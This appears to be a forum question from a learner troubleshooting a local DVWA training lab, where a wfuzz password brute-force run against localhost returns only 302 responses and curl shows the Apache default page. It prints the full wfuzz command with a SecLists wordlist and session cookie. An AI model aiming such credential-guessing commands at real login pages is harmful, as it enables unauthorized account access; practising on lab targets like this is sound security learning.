# Brute-Force by using XAMPP on windows, Ubuntu installed in Windows and DVWA

Tags: brute-force, ubuntu, dvwa

I am currently using XAMPP installed on windows to do a brute-force attack to DVWA. The command prompt that I used is Ubuntu, but the virtual machine is not opened and installed. Just a command prompt from Ubuntu that opened at Windows.

I am learning the brute-force attack from youtube. Which the URL is https://www.youtube.com/watch?v=SWzxoK6DAE4&list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q&index=2

While the XAMPP installation method referred from https://youtu.be/Yzksa_WjnY0?si=g4W1TqaP_imXBmbh

The place I've stuck at is when entering this commands.

> wfuzz -c -w ~/SecLists-master/SecLists-master/Passwords/probable-v2-top1575.txt -b 'security=low; PHPSESSID=ssi6chnm9nt9ojn5fatr94os9i' 'http://127.0.0.1/dvwa/vulnerabilities/brute/index.php?username=admin&password=FUZZ&Login=Login'

The expected output should be the password has started to be tested. The status code is 200 and the chars, lines and words should be having a value.

However, the output I get is shown as below :

```
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1/dvwa/vulnerabilities/brute/index.php?username=admin&password=FUZZ&Login=Login
Total requests: 1575

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   302        0 L      0 W        0 Ch        "123456"
000000030:   302        0 L      0 W        0 Ch        "jessica"
000000003:   302        0 L      0 W        0 Ch        "123456789"
000000015:   302        0 L      0 W        0 Ch        "master"
000000031:   302        0 L      0 W        0 Ch        "letmein"
000000007:   302        0 L      0 W        0 Ch        "123123"
000000032:   302        0 L      0 W        0 Ch        "baseball"
000000026:   302        0 L      0 W        0 Ch        "daniel"
000000021:   302        0 L      0 W        0 Ch        "666666"
000000025:   302        0 L      0 W        0 Ch        "iloveyou"
Total time: 0.786241
Processed Requests: 1575
Filtered Requests: 0
Requests/sec.: 2003.201
```

The output above is not the complete one, since the password amount is very large. So I cut most of them and paste part of them here with the total time, processed requests.

I feels like it is getting the same result before the PHPSESSID and the security level is entered into the commands, which is

> wfuzz -c -w ~/SecLists-master/SecLists-master/Passwords/probable-v2-top1575.txt 'http://127.0.0.1/dvwa/vulnerabilities/brute/index.php?username=admin&password=FUZZ&Login=Login'

I guess there's some error that most probably happened which is the PHPSESSID is wrong so that Ubuntu can't access and perform the brute-force attack. However, I try to refer the browser on windows who show cookies(using google chrome) that open the DVWA , I am taking the PHPSESSID from where I open the DVWA (google chrome). Lastly it keep returning status code 302 without giving any length of words, lines and chars.

Latest Update:
I have used commands curl http://127.0.0.1, the output shown is same as what the apache2 default page. What should I do to make the apache2 default page to become the DVWA login page same as the link that I have been attached on the code above?

Hope to listen some suggestion from everyone.
Could anyone give me some idea to solve this problem? I have been referring this problem for hours. Thank you in advance and have a nice day everyone.